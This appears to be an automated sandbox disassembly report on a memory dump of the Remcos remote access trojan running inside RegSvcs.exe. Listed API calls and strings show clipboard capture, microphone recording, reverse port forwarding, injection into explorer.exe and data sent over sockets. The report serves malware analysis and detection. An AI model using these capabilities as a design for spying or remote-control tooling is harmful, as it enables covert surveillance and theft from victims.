                                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                    • API String ID: 82841172-425784914
                                    • Opcode ID: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                                    • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                    • Opcode Fuzzy Hash: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                                    • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                    Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                    • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                    • __dosmaperr.LIBCMT ref: 0043A8A6
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                    • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                    • __dosmaperr.LIBCMT ref: 0043A8E3
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                    • __dosmaperr.LIBCMT ref: 0043A937
                                    • _free.LIBCMT ref: 0043A943
                                    • _free.LIBCMT ref: 0043A94A
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                    • String ID:
                                    • API String ID: 2441525078-0
                                    • Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                    • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                    • Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                    • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                    Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetEvent.KERNEL32(?,?), ref: 004054BF
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                    • TranslateMessage.USER32(?), ref: 0040557E
                                    • DispatchMessageA.USER32(?), ref: 00405589
                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                    • API String ID: 2956720200-749203953
                                    • Opcode ID: 0cfa6036874a5bca0beebe56fa67ee0d4ba4c2ce27f22afbcff1deb0655a3de4
                                    • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                    • Opcode Fuzzy Hash: 0cfa6036874a5bca0beebe56fa67ee0d4ba4c2ce27f22afbcff1deb0655a3de4
                                    • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                    Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                    • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                    • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                    • String ID: 0VG$0VG$<$@$Temp
                                    • API String ID: 1704390241-2575729100
                                    • Opcode ID: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
                                    • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                    • Opcode Fuzzy Hash: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
                                    • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                    Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenClipboard.USER32 ref: 00416941
                                    • EmptyClipboard.USER32 ref: 0041694F
                                    • CloseClipboard.USER32 ref: 00416955
                                    • OpenClipboard.USER32 ref: 0041695C
                                    • GetClipboardData.USER32(0000000D), ref: 0041696C
                                    • GlobalLock.KERNEL32(00000000), ref: 00416975
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                    • CloseClipboard.USER32 ref: 00416984
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                    • String ID: !D@
                                    • API String ID: 2172192267-604454484
                                    • Opcode ID: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                                    • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                    • Opcode Fuzzy Hash: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                                    • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                    Function 004132D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                    • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                    • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                    • CloseHandle.KERNEL32(?), ref: 00413465
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                    • String ID:
                                    • API String ID: 297527592-0
                                    • Opcode ID: d52479866b96e43482c4aa3c72be572081a765f83d9ebd10744e03b07182f042
                                    • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                    • Opcode Fuzzy Hash: d52479866b96e43482c4aa3c72be572081a765f83d9ebd10744e03b07182f042
                                    • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                    Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                    • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                    • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                    • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                    Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00448135
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00448141
                                    • _free.LIBCMT ref: 0044814C
                                    • _free.LIBCMT ref: 00448157
                                    • _free.LIBCMT ref: 00448162
                                    • _free.LIBCMT ref: 0044816D
                                    • _free.LIBCMT ref: 00448178
                                    • _free.LIBCMT ref: 00448183
                                    • _free.LIBCMT ref: 0044818E
                                    • _free.LIBCMT ref: 0044819C
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                    • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                    • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                    • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                    Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Eventinet_ntoa
                                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                    • API String ID: 3578746661-3604713145
                                    • Opcode ID: b7e545620812273330383cc3efdd9bcfc3879d757bd19d7a259961bf1a4de7a6
                                    • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                    • Opcode Fuzzy Hash: b7e545620812273330383cc3efdd9bcfc3879d757bd19d7a259961bf1a4de7a6
                                    • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                    Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DecodePointer
                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                    • API String ID: 3527080286-3064271455
                                    • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                    • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                    • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                    • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                    Function 0044B3BC Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                    • __fassign.LIBCMT ref: 0044B479
                                    • __fassign.LIBCMT ref: 0044B494
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
                                    • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                    • String ID: PkGNG
                                    • API String ID: 1324828854-263838557
                                    • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                    • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                    • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                    • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                    Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                    • Sleep.KERNEL32(00000064), ref: 00417521
                                    • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CreateDeleteExecuteShellSleep
                                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                    • API String ID: 1462127192-2001430897
                                    • Opcode ID: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                                    • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                    • Opcode Fuzzy Hash: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                                    • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                    Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                    • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe), ref: 0040749E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentProcess
                                    • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                    • API String ID: 2050909247-4242073005
                                    • Opcode ID: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                    • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                    • Opcode Fuzzy Hash: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                    • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                    Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                    Download Yara Rule
                                    APIs
                                    • _strftime.LIBCMT ref: 00401D50
                                      • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                    • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                    • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                    • API String ID: 3809562944-243156785
                                    • Opcode ID: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
                                    • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                    • Opcode Fuzzy Hash: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
                                    • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                    Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                    • int.LIBCPMT ref: 00410E81
                                      • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                      • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                    • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                    • __Init_thread_footer.LIBCMT ref: 00410F29
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                    • String ID: ,kG$0kG
                                    • API String ID: 3815856325-2015055088
                                    • Opcode ID: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
                                    • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                    • Opcode Fuzzy Hash: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
                                    • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                    Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                    • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                    • waveInStart.WINMM ref: 00401CFE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                    • String ID: dMG$|MG$PG
                                    • API String ID: 1356121797-532278878
                                    • Opcode ID: 993692589c413c6f5f0556b0fca4e76cf40985a39ae9ebd2fae1836bdcb2a895
                                    • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                    • Opcode Fuzzy Hash: 993692589c413c6f5f0556b0fca4e76cf40985a39ae9ebd2fae1836bdcb2a895
                                    • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                    Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                      • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                      • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                      • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                    • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                    • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                    • TranslateMessage.USER32(?), ref: 0041D4E9
                                    • DispatchMessageA.USER32(?), ref: 0041D4F3
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                    • String ID: Remcos
                                    • API String ID: 1970332568-165870891
                                    • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                    • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                    • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                    • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                    Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
                                    • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                    • Opcode Fuzzy Hash: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
                                    • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                    Function 00453D83 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCPInfo.KERNEL32(?,?), ref: 00453E2F
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453EB2
                                    • __alloca_probe_16.LIBCMT ref: 00453EEA
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453F45
                                    • __alloca_probe_16.LIBCMT ref: 00453F94
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453F5C
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453FD8
                                    • __freea.LIBCMT ref: 00454003
                                    • __freea.LIBCMT ref: 0045400F
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                    • String ID:
                                    • API String ID: 201697637-0
                                    • Opcode ID: cf0f5bca4b9d7a6a0537f160270e877f32bb2155bdb84350bfddf98010c842c7
                                    • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                    • Opcode Fuzzy Hash: cf0f5bca4b9d7a6a0537f160270e877f32bb2155bdb84350bfddf98010c842c7
                                    • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                    Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • _memcmp.LIBVCRUNTIME ref: 00445423
                                    • _free.LIBCMT ref: 00445494
                                    • _free.LIBCMT ref: 004454AD
                                    • _free.LIBCMT ref: 004454DF
                                    • _free.LIBCMT ref: 004454E8
